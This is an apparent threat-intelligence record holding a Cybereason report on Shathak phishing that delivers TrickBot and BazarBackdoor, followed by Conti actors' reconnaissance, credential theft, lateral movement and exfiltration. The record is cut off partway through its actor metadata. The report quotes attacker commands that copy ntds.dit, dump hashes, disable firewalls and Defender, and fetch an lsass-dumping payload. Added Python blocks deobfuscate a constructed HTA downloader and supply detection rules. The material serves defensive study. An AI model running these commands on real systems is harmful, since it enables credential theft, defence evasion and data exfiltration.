{
	"id": "e5e442f3-2152-46f2-8d11-b6f154d4c49d",
	"created_at": "2026-04-06T00:16:32.004535Z",
	"updated_at": "2026-04-10T03:37:23.809428Z",
	"deleted_at": null,
	"sha1_hash": "d21d996d312effb0bcb3a5d02c443a98940ccb24",
	"title": "THREAT ANALYSIS REPORT: From Shathak Emails to the Conti Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1281881,
	"plain_text": "THREAT ANALYSIS REPORT: From Shathak Emails to the Conti Ransomware\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-05 20:01:57 UTC\r\nThe Cybereason Global Security Operations Center (GSOC) issues Cybereason Threat Analysis reports to inform on threats that impact organizations. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.\r\nIn this Threat Analysis report, the GSOC investigates recent attack campaigns that reflect the current developments of the ITG23 threat group (also known as the TrickBot Gang or Wizard Spider). The ITG23 group is partnering with the TA551 (Shathak) threat group to distribute ITG23’s TrickBot and BazarBackdoor malware, which malicious actors use to deploy ITG23’s Conti ransomware on compromised systems.\r\nKey Findings\r\nBeware of Shathak Emails: In partnership with the ITG23 threat group, the Shathak threat group distributes ITG23’s TrickBot and BazarBackdoor malware as password-protected archive files attached to phishing emails. The archive files contain malicious documents whose macros download and execute the TrickBot or BazarBackdoor malware. Malicious actors actively use this malware to deploy ITG23’s Conti ransomware on compromised systems.\r\nAverage Two Days Time-to-Ransom (TTR): Conti actors do not deploy ransomware immediately after initial infection using the TrickBot or BazarBackdoor malware. The actors first conduct other activities, such as reconnaissance, credential theft, and data exfiltration. We observed an average TTR of approximately two days after initial infection.\r\nDetected and Prevented: The Cybereason Defense Platform detects and prevents infections that use the TrickBot and BazarBackdoor malware that the Shathak threat group distributes, as well as malicious activities that Conti actors conduct.\r\nCybereason Managed Detection and Response (MDR): The Cybereason GSOC has zero tolerance towards attacks that involve ransomware, such as the Conti ransomware, and categorizes such attacks as critical, high-severity incidents. The Cybereason GSOC MDR team issues a comprehensive report to customers when such an incident occurs. The report provides an in-depth overview of the incident, which helps to scope the extent of compromise and the impact on the customer’s environment. In addition, the report provides attribution information when possible, as well as recommendations for mitigating and isolating the threat.\r\nIntroduction\r\nThe threat group TA551, also known as Shathak, is an email-based malware distributor that distributes malware through phishing emails. Shathak has distributed a variety of malware, predominantly malware with information-stealing capabilities, such as Ursnif and Valak in 2020, and the IcedID malware after mid-July 2020.\r\nIn October 2021, IBM X-Force reported that the threat group ITG23, also known as the TrickBot Gang or Wizard Spider, had partnered with Shathak at some time around July 2021 to distribute the TrickBot and BazarBackdoor (also referred to as BazarLoader) malware. ITG23 develops and maintains TrickBot and BazarBackdoor. Both TrickBot and BazarBackdoor can deploy additional malware on compromised systems. TrickBot is a feature-rich and modular malware that has been present on the threat landscape since 2016.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 1 of 16\r\nThe implementation of TrickBot has evolved over the years, with recent versions of TrickBot implementing malware-loading capabilities. TrickBot has played a major role in many attack campaigns conducted by different threat actors, from common cybercriminals to nation-state actors. These campaigns have often involved the deployment of ransomware such as the Ryuk ransomware.\r\nSince March 2021, malicious actors have been using TrickBot and BazarBackdoor to deploy the Conti ransomware on compromised systems. The ITG23 threat group originally developed and now maintains the Conti ransomware. ITG23 uses the ransomware-as-a-service (RaaS) model, under which the developers of the ransomware pay the operators of the ransomware either a wage for a successful attack or a percentage of the ransom payments.\r\nConti actors, or Conti ransomware operators, have proven to be a substantial threat by compromising organizations where IT outages can have life-threatening consequences, such as hospitals and law enforcement agencies. In September 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) and the US Federal Bureau of Investigation (FBI) reported that more than 400 Conti ransomware attacks had taken place on U.S. and international organizations. Conti actors frequently use a double extortion tactic: if the victim refuses to pay for data decryption, the malicious actor threatens to leak the data or sell it for profit.\r\nThis report discusses recent attack campaigns that reflect the current developments of ITG23 partnering with Shathak to distribute the TrickBot and BazarBackdoor malware, which malicious actors use to deploy the Conti ransomware on compromised systems. To this end, the report first provides an overview of a system infection using the TrickBot or BazarBackdoor malware that the Shathak group distributes, based on recent Shathak malware distribution campaigns that we analyzed.
The report then discusses Conti actor activities that are common across recent Conti actor attack campaigns that we analyzed. We focus on activities that Conti actors conduct after establishing a foothold in a system using BazarBackdoor or TrickBot and before ransomware deployment. A previous report by the Cybereason Nocturnus team documents the execution of the Conti ransomware.\r\nAnalysis of Shathak and Conti Ransomware\r\nA Successful Partnership: Shathak and the TrickBot Gang\r\nThe figure below depicts a typical infection using ITG23’s TrickBot or BazarBackdoor malware that the Shathak group distributes:\r\nA typical infection using the TrickBot or the BazarBackdoor malware\r\nThe Shathak group distributes TrickBot and BazarBackdoor through malicious documents, such as Microsoft Word documents. Shathak stores the malicious documents in password-protected archive files and attaches the archive files to phishing emails. A typical malicious document contains a macro, which a user executes by opening the document and enabling macro execution.\r\nThe macro drops an HTML Application (HTA) file on the file system and then executes the file using the mshta.exe Windows utility. Malicious actors use mshta.exe to execute malicious HTA files and bypass application control solutions that do not account for the malicious use of this Windows utility.\r\nAn HTA file that we analyzed, named boxDeling.hta, has two main components: base64-encoded code stored in an element of the boxDeling.hta file with the ID mainSetDel, and a VBScript script that executes the encoded code:\r\nA macro in a malicious Microsoft Word document executes an HTA file as seen in the Cybereason Defense Platform\r\nThe content of boxDeling.hta: base64-encoded code and a VBScript script that executes the encoded code\r\nThe base64-encoded code is a JavaScript script that the malicious actors have obfuscated by using the string reversal technique. The JavaScript script conducts the following activities:\r\nContacts the attacker-controlled endpoint airloweryd.com, located in Germany, and downloads the TrickBot malware in the form of a dynamic-link library (DLL) file. The JavaScript script in other HTA files may contact a different endpoint and download other malware, such as BazarBackdoor.\r\nStores the downloaded DLL file as boxDelInt.jpg in the Public directory (C:\\Users\\Public\\).\r\nExecutes boxDelInt.jpg (the TrickBot DLL) using the regsvr32.exe Windows utility. Note that regsvr32.exe loads the file it is given as a DLL regardless of the file extension and calls the DLL’s DllRegisterServer export, so the .jpg extension only serves to evade extension-based filtering. The JavaScript script executes regsvr32.exe using the WshShell object of the Windows Script Host object model:\r\nThe obfuscated and deobfuscated version of the JavaScript script in boxDeling.hta\r\nIn recent Shathak malware distribution campaigns that we analyzed, the attacker-controlled endpoints from which malicious HTA files downloaded malware were primarily located in European countries, with the Netherlands and Slovakia at the top of the list.\r\nMalicious actors use the TrickBot or BazarBackdoor malware that the Shathak group distributes to deploy additional malware, such as the Conti ransomware. In recent Conti actor attacks that we analyzed, we observed that Conti actors do not deploy ransomware immediately after initial compromise using TrickBot or BazarBackdoor. The actors first conduct other activities, such as reconnaissance, credential theft, and data exfiltration. We observed an average TTR of approximately two days after initial infection. The next section discusses Conti actor activities that are common across recent attack campaigns that we analyzed. We focus on activities that Conti actors conduct after establishing a foothold in a system by using the BazarBackdoor or TrickBot malware that Shathak distributes and before ransomware deployment.
Conti Actors Take Over from Shathak: Common Activities\r\nCobalt Strike Deployment\r\nConti actors deploy a Cobalt Strike beacon after initial system compromise by using TrickBot or BazarBackdoor. Cobalt Strike is a common tool of Conti actors for different malicious activities, such as command execution, credential theft, and lateral movement. Conti actors deploy a Cobalt Strike beacon in the form of a dynamic-link library (DLL) file stored in the ProgramData directory, such as C:\\ProgramData. Conti actors then invoke an exported function of the DLL file, such as StartW or gimbild, using the rundll32.exe Windows utility:\r\nConti actors execute a Cobalt Strike beacon as seen in the Cybereason Defense Platform\r\nConti actors establish persistence of the deployed Cobalt Strike beacon by creating a scheduled task using the schtasks Windows utility. The scheduled task executes the Cobalt Strike beacon by invoking an exported function of the DLL file that implements the beacon using the rundll32.exe utility. Conti actors deploy Cobalt Strike beacons laterally on other networked machines by executing the schtasks utility with the /s command line parameter specifying the target machine:\r\nA scheduled task executes a Cobalt Strike beacon as seen in the Cybereason Defense Platform\r\nReconnaissance\r\nIn attack campaigns where a BazarBackdoor infection is the initial entry point into an infrastructure, Conti actors conduct reconnaissance activities by using BazarBackdoor to execute the following commands:\r\nnltest /domain_trusts /all_trusts: Enumerates trust relationships in a Windows Active Directory (AD) environment.\r\nnet localgroup administrator: Enumerates the members of the local Administrators group.\r\nnet group \"domain admins\" /domain: Enumerates the members of the Domain Admins group; the /domain switch runs the query against the domain controller (DC) rather than against the local machine.\r\nnet view /all /domain: Enumerates the domains visible on the network; with /all, share listings also include hidden administrative shares.\r\nnet view /all: Enumerates the computers and shared resources visible from the system, including hidden administrative shares.\r\nIn addition to the nltest and net Windows utilities, Conti actors use publicly available network scanning tools for reconnaissance, such as the Advanced IP Scanner and NetScan tools:\r\nConti actors conduct reconnaissance activities using net and NetScan as seen in the Cybereason Defense Platform\r\nConti actors also use the AdFind tool to explore AD environments in greater detail. Conti actors typically execute AdFind from a Windows batch file (.bat) that is placed on the file system:\r\nConti actors execute AdFind commands as seen in the Cybereason Platform\r\nCredential and Data Theft\r\nConti actors steal credentials by dumping the memory of the Local Security Authority Subsystem Service (lsass) process. Conti actors download a PowerShell payload from an attacker-controlled endpoint, such as httpx://datasecuritytoday[.]com::757/securiday, which dumps credentials from lsass:\r\nConti actors download payload from httpx://datasecuritytoday[.]com::757/securiday as seen in the Cybereason Defense Platform\r\nIn addition to credentials present in the memory of lsass instances, Conti actors steal AD data and credentials that are stored in ntds.dit files by copying these files. The ntds.dit files are database files that are present on AD DCs, and these files store AD data, such as password hashes and information about AD user objects, groups, and group memberships. Conti actors copy ntds.dit files into the C:\\Windows\\Temp\\crashpad directory by using the ntdsutil tool:\r\nntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\windows\\temp\\crashpad\" q q\r\nThe ifm (install from media) option writes a consistent copy of ntds.dit together with the SYSTEM registry hive, which holds the boot key needed to decrypt the password hashes stored in the database; this is why offline hash extraction tools require both files. In addition to ntdsutil, Conti actors use the NtdsAudit tool to dump AD domain user details and password hashes from previously copied ntds.dit files:\r\nntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv\r\nOn machines running Microsoft SQL Server, Conti actors dump databases by using the sqlcmd utility. The sqlcmd commands that the actors execute follow the guidelines for dumping data from databases in the publicly disclosed manuals of the Conti Ransomware Affiliate Program:\r\nConti actors dump data from a database as seen in the Cybereason Defense Platform\r\nLateral Movement\r\nConti actors move laterally to Windows Server instances primarily by using the Remote Desktop Protocol (RDP). Conti actors enable RDP connectivity if necessary on compromised machines by creating and setting the following registry value to 0:\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections\r\nConti actors then use the netsh utility to modify Windows Firewall rules:\r\nnetsh advfirewall set allprofiles state off\r\nnetsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\r\nnetsh firewall set service type = remotedesktop mode = enable\r\nIn addition to establishing RDP connections, Conti actors deploy Cobalt Strike beacons laterally on networked machines by executing the schtasks utility with the /s command line parameter specifying the target machine. Conti actors also disable the real-time monitoring feature of the Windows Defender security solution laterally on networked machines by executing the PowerShell command Set-MpPreference -DisableRealTimeMonitoring $true.\r\nConti actors execute the PowerShell command laterally by using the schtasks utility and the Windows Management Instrumentation (WMI) command-line utility (WMIC), with the /node WMIC parameter specifying the target machine:\r\nConti actors laterally disable the real-time monitoring feature of Windows Defender as seen in the Cybereason Defense Platform\r\nData Exfiltration\r\nConti actors typically exfiltrate data before deploying the Conti ransomware. The exfiltrated data contains stolen credentials and other data, including potentially sensitive data that the actors can use for extortion. To exfiltrate data to a remote endpoint, Conti actors use the Rclone tool, whose executable name the actors typically change to evade detection. In the Conti actor campaigns that we analyzed, the actors changed the executable name of Rclone to sihosts.exe and serhosts.exe:\r\nConti actors execute Rclone (executable name changed to sihosts.exe) to exfiltrate data as seen in the Cybereason Defense Platform\r\nDetection and Prevention\r\nThe Cybereason Defense Platform\r\nThe Cybereason Defense Platform detects threats using multi-layer protection that detects and blocks malicious activities with threat intelligence, machine learning, and next-generation antivirus (NGAV) capabilities. The Cybereason Platform is able to detect and prevent infections that use the TrickBot and BazarBackdoor malware that the Shathak threat group distributes, as well as malicious activities that Conti actors conduct.\r\n
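Added example (not part of the original report and not Cybereason code): a triage script for the attachment stage described earlier, an HTA whose payload is base64 text inside an element with a known ID (mainSetDel in boxDeling.hta) and whose decoded JavaScript hides its strings by reversal. It pulls the blob out of that element, decodes it, tries every string literal both as written and reversed, and rebuilds the script with the reversed literals restored, so the downloaded URL, the drop path and the regsvr32 launch become visible. The sample HTA is constructed for the example: the URL loader.example, the VBScript stub and the JavaScript body are assumptions and not the content of the real file.

```python
# Added example, not code from the report: triage of a Shathak-style HTA whose
# payload is a base64 blob in an element with a known ID and whose decoded
# JavaScript obfuscates strings by reversal. The sample HTA is constructed;
# loader.example, the VBScript stub and the JavaScript body are assumptions.
import base64
import re
from html.parser import HTMLParser

LOLBINS = ('regsvr32', 'rundll32', 'mshta', 'powershell', 'cmd')
COM_OBJECTS = ('wscript.shell', 'msxml2.xmlhttp', 'adodb.stream')
_LITERAL = re.compile('([\'\"])(.*?)\\1')  # quoted JavaScript string literals


class _ElementText(HTMLParser):
    # Collects the text inside the first element whose id attribute matches.
    def __init__(self, wanted_id):
        super().__init__()
        self.wanted_id, self.capturing, self.chunks = wanted_id, False, []

    def handle_starttag(self, tag, attrs):
        if dict(attrs).get('id') == self.wanted_id:
            self.capturing = True

    def handle_endtag(self, tag):
        self.capturing = False

    def handle_data(self, data):
        if self.capturing:
            self.chunks.append(data)


def classify(value):
    # Indicator type of a string as written, or None if it looks like noise.
    v = value.strip().lower()
    first = v.split()[0] if v.split() else ''
    if v.startswith(('http://', 'https://')):
        return 'url'
    if len(v) > 3 and v[1:3] == ':\\':
        return 'path'
    if first in LOLBINS:
        return 'command'
    if v in COM_OBJECTS:
        return 'com-object'
    return None


def triage_hta(hta_text, element_id='mainSetDel'):
    # Returns the deobfuscated script and (value, kind, was_reversed) indicators.
    parser = _ElementText(element_id)
    parser.feed(hta_text)
    script = base64.b64decode(''.join(parser.chunks).strip()).decode('utf-8', 'replace')
    indicators = []

    def fix(match):
        quote, body = match.group(1), match.group(2)
        if not body:
            return match.group(0)
        kind = classify(body)
        if kind:
            indicators.append((body, kind, False))
            return match.group(0)
        kind = classify(body[::-1])  # the string-reversal trick
        if kind:
            indicators.append((body[::-1], kind, True))
            return quote + body[::-1] + quote
        return match.group(0)

    return {'script': _LITERAL.sub(fix, script), 'indicators': indicators}


# Constructed sample; the layout mirrors the report's description, not its bytes.
PAYLOAD_URL = 'http://loader.example/boxDelInt.jpg'
DROP_PATH = 'C:\\Users\\Public\\boxDelInt.jpg'
_JS_OBFUSCATED = (
    'var u = \"' + PAYLOAD_URL[::-1] + '\".split(\"\").reverse().join(\"\");'
    'var p = \"' + DROP_PATH[::-1] + '\".split(\"\").reverse().join(\"\");'
    'var s = new ActiveXObject(\"WScript.Shell\");'
    's.Run(\"' + 'regsvr32 '[::-1] + '\".split(\"\").reverse().join(\"\") + p, 0, true);'
)
SAMPLE_HTA = (
    '<html><head><script language=\"VBScript\">'
    'Set e = document.getElementById(\"mainSetDel\")'  # stub, not the real runner
    '</script></head><body><div id=\"mainSetDel\">'
    + base64.b64encode(_JS_OBFUSCATED.encode()).decode() +
    '</div></body></html>'
)

if __name__ == '__main__':
    result = triage_hta(SAMPLE_HTA)
    print(result['script'])
    for value, kind, was_reversed in result['indicators']:
        print(kind, repr(value), 'reversed' if was_reversed else 'as-is')
```

Running the block prints the restored script and one line per indicator; for a real sample, pass the file contents to triage_hta with the ID observed in that file, and treat the returned URL and path as the artifacts to pivot on.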
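Added example (not part of the original report and not the Cybereason Platform's detection logic): the post-compromise behaviours described in the previous sections, from the Office-to-mshta chain through renamed Rclone, expressed as narrow rules over process-creation events and run over constructed sample events. Field names follow the Sysmon Event ID 1 layout (Image, ParentImage, CommandLine, OriginalFileName); the host names, task, DLL and share names in the sample are assumptions, not indicators from the report. Each rule is tied to one observation so that it can be tuned against an environment's baseline; the two benign events show that ordinary regsvr32 and notepad launches stay quiet.

```python
# Added example, not Cybereason's detection logic: the observed Shathak-to-Conti
# behaviours as rules over process-creation events. Sample events are
# constructed; FILESRV01, WS02, Updater, upd.dll and the share path are assumptions.
import ntpath

OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'}


def image_name(path):
    # 'C:\Windows\System32\mshta.exe' -> 'mshta.exe'
    return ntpath.basename(path or '').lower()


def last_argument(command_line):
    tokens = command_line.split()
    return tokens[-1].strip('\"').lower() if tokens else ''


def office_spawns_mshta(e):
    return image_name(e['ParentImage']) in OFFICE_APPS and image_name(e['Image']) == 'mshta.exe'


def regsvr32_public_non_dll(e):
    # regsvr32 loads its argument as a DLL whatever the extension (boxDelInt.jpg).
    cl = e['CommandLine'].lower()
    return (image_name(e['Image']) == 'regsvr32.exe' and '\\users\\public\\' in cl
            and not last_argument(cl).endswith('.dll'))


def rundll32_programdata_export(e):
    # rundll32 calling an export (StartW, gimbild, ...) of a DLL dropped in ProgramData.
    cl = e['CommandLine'].lower()
    return image_name(e['Image']) == 'rundll32.exe' and '\\programdata\\' in cl and ',' in cl


def schtasks_remote_create(e):
    tokens = e['CommandLine'].lower().split()
    return image_name(e['Image']) == 'schtasks.exe' and '/create' in tokens and '/s' in tokens


def wmic_remote_node(e):
    return image_name(e['Image']) == 'wmic.exe' and '/node:' in e['CommandLine'].lower()


def domain_recon(e):
    cl = ' '.join(e['CommandLine'].lower().split())
    needles = ('nltest /domain_trusts', 'domain admins', 'net localgroup administrator',
               'net view /all', 'adfind')
    return any(n in cl for n in needles)


def ntds_extraction(e):
    cl = e['CommandLine'].lower()
    name = image_name(e['Image'])
    return (name == 'ntdsutil.exe' and 'ifm' in cl and 'create full' in cl) or name == 'ntdsaudit.exe'


def rdp_enablement(e):
    cl = ' '.join(e['CommandLine'].lower().split())
    return (('fdenytsconnections' in cl and '/d 0' in cl)
            or ('netsh' in cl and ('allprofiles state off' in cl or 'remote desktop' in cl
                                   or 'remotedesktop' in cl)))


def defender_realtime_off(e):
    cl = e['CommandLine'].lower()
    return 'set-mppreference' in cl and 'disablerealtimemonitoring' in cl and '$false' not in cl


def renamed_rclone(e):
    # The PE's OriginalFileName survives a rename on disk (sihosts.exe, serhosts.exe).
    original = (e.get('OriginalFileName') or '').lower()
    return original == 'rclone.exe' and image_name(e['Image']) != 'rclone.exe'


RULES = [office_spawns_mshta, regsvr32_public_non_dll, rundll32_programdata_export,
         schtasks_remote_create, wmic_remote_node, domain_recon, ntds_extraction,
         rdp_enablement, defender_realtime_off, renamed_rclone]


def scan(events):
    # (rule name, event id) for every rule each event trips, in event order.
    return [(rule.__name__, e['id']) for e in events for rule in RULES if rule(e)]


def _ev(i, parent, image, cmd, original=None):
    return {'id': i, 'ParentImage': parent, 'Image': image, 'CommandLine': cmd,
            'OriginalFileName': original}


SYS32 = 'C:\\Windows\\System32\\'
SAMPLE_EVENTS = [  # constructed telemetry
    _ev(1, 'C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE', SYS32 + 'mshta.exe',
        'mshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\boxDeling.hta'),
    _ev(2, SYS32 + 'mshta.exe', SYS32 + 'regsvr32.exe', 'regsvr32.exe C:\\Users\\Public\\boxDelInt.jpg'),
    _ev(3, SYS32 + 'regsvr32.exe', SYS32 + 'rundll32.exe', 'rundll32.exe C:\\ProgramData\\upd.dll,StartW'),
    _ev(4, SYS32 + 'cmd.exe', SYS32 + 'schtasks.exe',
        'schtasks /create /s FILESRV01 /tn Updater /tr \"rundll32.exe C:\\ProgramData\\upd.dll,StartW\" /sc onstart'),
    _ev(5, SYS32 + 'cmd.exe', SYS32 + 'nltest.exe', 'nltest /domain_trusts /all_trusts'),
    _ev(6, SYS32 + 'cmd.exe', SYS32 + 'ntdsutil.exe',
        'ntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\windows\\temp\\crashpad\" q q'),
    _ev(7, SYS32 + 'cmd.exe', SYS32 + 'reg.exe',
        'reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    _ev(8, SYS32 + 'cmd.exe', SYS32 + 'WindowsPowerShell\\v1.0\\powershell.exe',
        'powershell.exe Set-MpPreference -DisableRealTimeMonitoring $true'),
    _ev(9, SYS32 + 'cmd.exe', SYS32 + 'wbem\\WMIC.exe',
        'wmic /node:WS02 process call create \"powershell Set-MpPreference -DisableRealTimeMonitoring $true\"'),
    _ev(10, SYS32 + 'cmd.exe', 'C:\\ProgramData\\sihosts.exe',
        'sihosts.exe copy C:\\Shares\\Finance remote:exfil --transfers 8', original='rclone.exe'),
    _ev(11, 'C:\\Windows\\explorer.exe', SYS32 + 'notepad.exe', 'notepad.exe notes.txt'),
    _ev(12, SYS32 + 'msiexec.exe', SYS32 + 'regsvr32.exe',
        'regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll', original='REGSVR32.EXE'),
]

if __name__ == '__main__':
    for name, event_id in scan(SAMPLE_EVENTS):
        print(event_id, name)
```

Event 9 trips two rules (remote WMIC execution and the Defender change it carries), which is the expected shape of a lateral Set-MpPreference: alert on the WMIC parent and the PowerShell child separately, and correlate by target host.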
Examples of activities that the Cybereason Platform detects:\r\nUsers opening malicious email attachments distributed by the Shathak group\r\nThe Cybereason Defense Platform detects users opening malicious email attachments\r\nConti actors deploying a Cobalt Strike beacon\r\nThe Cybereason Defense Platform detects the deployment of Cobalt Strike beacons\r\nConti actors stealing credentials by dumping the memory of the lsass process\r\nThe Cybereason Defense Platform detects the dumping of lsass memory\r\nConti actors exfiltrating data using the Rclone tool\r\nThe Cybereason Defense Platform detects data exfiltration activities\r\nConti actors executing the Conti ransomware\r\nGeneral Recommendations\r\nSecurely handle email messages that originate from external sources. This includes disabling hyperlinks and investigating the content of email messages to identify phishing attempts.\r\nEnable the Anti-Ransomware feature in Cybereason NGAV and set the Anti-Ransomware protection mode to Prevent.\r\nEnable the Anti-Malware feature in Cybereason NGAV and enable the Detect and Prevent modes of this feature.\r\nDisable unused RDP services, properly secure used RDP services, and regularly monitor RDP log data for irregular activities.\r\nRegularly back up files to a secured remote location and implement a data recovery plan. Regular data backups ensure that you can restore your data after a ransomware attack.\r\nUse secure passwords, regularly rotate passwords, and use multi-factor authentication where possible.\r\nCybereason is dedicated to teaming with defenders to end cyber attacks from endpoints to the enterprise to everywhere, including modern ransomware. Schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.\r\nMITRE ATT\u0026CK Techniques\r\nInitial Access: Phishing: Spearphishing Attachment\r\nExecution: User Execution: Malicious File; Scheduled Task/Job: Scheduled Task; Windows Management Instrumentation\r\nPersistence: Scheduled Task/Job: Scheduled Task\r\nDefense Evasion: Signed Binary Proxy Execution: Mshta; Signed Binary Proxy Execution: Regsvr32; Signed Binary Proxy Execution: Rundll32; Modify Registry\r\nCredential Access: OS Credential Dumping: LSASS Memory; OS Credential Dumping: NTDS\r\nDiscovery: Account Discovery; Domain Trust Discovery; Network Service Scanning; Remote System Discovery\r\nLateral Movement: Remote Services: Remote Desktop Protocol\r\nExfiltration: Exfiltration Over Alternative Protocol\r\nAbout the Researchers:\r\nAleksandar Milenkoski, Senior Threat and Malware Analyst, Cybereason Global SOC\r\nAleksandar Milenkoski is a Senior Threat and Malware Analyst with the Cybereason Global SOC team. He is involved primarily in reverse engineering and threat research activities. Aleksandar has a PhD in system security. Prior to Cybereason, his work focused on research in intrusion detection and reverse engineering security mechanisms of the Windows 10 operating system.\r\nEli Salem, Senior Security Analyst, Cybereason Global SOC\r\nEli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private sector of the cyber security industry since 2017. In his free time, he publishes articles about malware research and threat hunting.\r\nYonatan Gidnian, Senior Security Analyst and Threat Hunter, Cybereason Global SOC\r\nYonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC team. Yonatan analyses critical incidents and hunts for novel threats in order to build new detections. He began his career in the Israeli Air Force where he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate about malware analysis, digital forensics, and incident response.\r\nAbout the Author\r\nCybereason Global SOC Team\r\nThe Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on every continent. Led by cybersecurity experts with experience working for government, the military and multiple industry verticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive threats to support our mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle moves.\r\nSource: https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware"
	],
	"report_names": [
		"threat-analysis-report-from-shatak-emails-to-the-conti-ransomware"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
